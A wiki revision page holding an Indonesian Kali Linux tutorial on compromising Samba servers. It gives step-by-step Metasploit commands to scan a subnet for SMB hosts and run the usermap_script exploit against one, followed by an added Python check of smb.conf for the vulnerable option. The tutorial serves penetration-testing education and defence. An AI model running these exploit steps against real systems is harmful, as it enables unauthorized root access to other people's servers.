Difference between revisions of "Kali Linux: Membobol Network Neighbourhood / SAMBA"

From OnnoWiki
Line 4: Line 4:
  
  
==Lakukan Enumerasi==
+
==Jalankan msfconsole==
  
 
Ketik di console
 
Ketik di console
Line 37: Line 37:
 
  + -- --=[ 432 payloads - 37 encoders - 8 nops            ]
 
  + -- --=[ 432 payloads - 37 encoders - 8 nops            ]
 
  + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]  
 
  + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]  
 
 
  
  
Line 67: Line 65:
 
  + -- --=[ 432 payloads - 37 encoders - 8 nops            ]
 
  + -- --=[ 432 payloads - 37 encoders - 8 nops            ]
 
  + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
 
  + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
 +
 +
==Lakukan enumerasi==
  
  
Line 106: Line 106:
 
  [*] Scanned 256 of 256 hosts (100% complete)
 
  [*] Scanned 256 of 256 hosts (100% complete)
 
  [*] Auxiliary module execution completed
 
  [*] Auxiliary module execution completed
 +
 +
==exploit==
  
  
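Review bot: The new heading `==exploit==` in this hunk is lowercase and a bare verb, while the other headings added in this revision are capitalised imperative phrases (`==Jalankan msfconsole==`, `==Lakukan enumerasi==`). Suggest renaming it to match, for example `==Lakukan exploit==`, so the section list reads consistently.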
Line 136: Line 138:
  
  
 +
Jika sudah selesai
  
And like magic we have a command shell! Meaning we are in the SAMBA server itself, if we type “ls” without quotes this will list the directory, with this exploit we are in the root folder. Now just to be 100% sure we owned this box, I want you to type “whoami” without quotes and you can see below for yourself the server responded with “root” Good Game Samba Box!
+
quit
 
 
whoami
 
 
 
This concludes the owning Samba Servers blog, I will have more introduction blogs coming soon on the Metasploit framework so stay tuned!
 
  
 
==Referensi==
 
==Referensi==
  
 
* http://www.elithecomputerguy.com/2013/01/22/hacking-samba-smb-servers-in-metasploit/
 
* http://www.elithecomputerguy.com/2013/01/22/hacking-samba-smb-servers-in-metasploit/

Revision as of 07:38, 11 February 2016

Source: http://www.elithecomputerguy.com/2013/01/22/hacking-samba-smb-servers-in-metasploit/



Run msfconsole

Type in the console

msfconsole

The output will look roughly like this

  Metasploit Park, System Security Interface
  Version 4.0.5, Alpha E
  Ready...
  > access security
  access: PERMISSION DENIED.
  > access security grid
  access: PERMISSION DENIED.
  > access main security grid
  access: PERMISSION DENIED....and...
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!


Easy phishing: Set up email templates, landing pages and listeners
in Metasploit Pro -- learn more on http://rapid7.com/metasploit 

       =[ metasploit v4.11.4-2015071403                   ]
+ -- --=[ 1467 exploits - 840 auxiliary - 232 post        ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] 


For a more polite version, type

msfconsole thankyou

The output will be


     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     ||| 


Validate lots of vulnerabilities to demonstrate exposure
with Metasploit Pro -- Learn more on http://rapid7.com/metasploit 

       =[ metasploit v4.11.4-2015071403                   ]
+ -- --=[ 1467 exploits - 840 auxiliary - 232 post        ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

Perform enumeration

Type

use auxiliary/scanner/smb/smb_version
show options

Output

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target address range or CIDR identifier
   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads

Type

set RHOSTS 192.168.0.0/24
set THREADS 75
run

The result

[*] 192.168.0.7:445 could not be identified: Unix (Samba 3.6.3-31a.osstech)
[*] Scanned  44 of 256 hosts (17% complete)
[*] Scanned  68 of 256 hosts (26% complete)
[*] Scanned  78 of 256 hosts (30% complete)
[*] 192.168.0.90:445 is running Windows 7 Professional SP1 (build:7601) (name:HP-PC) (domain:WORKGROUP)
[*] Scanned 152 of 256 hosts (59% complete)
[*] Scanned 153 of 256 hosts (59% complete)
[*] 192.168.0.221:445 could not be identified: Unix (Samba 3.0.37)
[*] Scanned 156 of 256 hosts (60% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 227 of 256 hosts (88% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

exploit

Type

use exploit/multi/samba/usermap_script
show options

Output

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port
 

Exploit target:

   Id  Name
   --  ----
   0   Automatic


Type

set RHOST 192.168.0.7
exploit


When finished

quit
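
The `usermap_script` module used above depends on the Samba server's smb.conf setting the non-default `username map script` option, so the defender's first check is whether that option is present on each Samba host the scan found. The audit below is an added example, not part of the original page or of Samba or Metasploit; the function names and the sample configuration are constructed for illustration, and `include` directives are not followed.

```python
import re

# Constructed sample smb.conf (not from the page): the option is set in
# [global] with odd case/spacing and a backslash line continuation.
SAMPLE_CONF = r"""
# constructed example
[global]
   workgroup = WORKGROUP
   ; username map script = /bin/true
   UserName  Map Script = /usr/local/bin/mapusers \
        --lookup
[public]
   path = /srv/public
"""

def normalize(name):
    """Samba compares parameter names ignoring case and whitespace."""
    return re.sub(r"\s+", "", name).lower()

def parse_smb_conf(text):
    """Return {section: {normalized_param: value}} for smb.conf text."""
    sections, current, pending = {}, None, ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        pending = ""
        if line.endswith("\\"):            # continuation: join with next line
            pending = line[:-1].rstrip() + " "
            continue
        if not line or line[0] in "#;":    # blank line or comment
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            name, value = line.split("=", 1)
            sections[current][normalize(name)] = value.strip()
    return sections

def audit_username_map_script(text):
    """Return (section, value) for every section that sets 'username map script'."""
    return [(section, params["usernamemapscript"])
            for section, params in parse_smb_conf(text).items()
            if params.get("usernamemapscript")]

if __name__ == "__main__":
    for section, value in audit_username_map_script(SAMPLE_CONF):
        print(f"[{section}] username map script = {value}  (review/remove)")
```

Any finding means the option should be removed or the server upgraded before the host is exposed to untrusted clients.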

References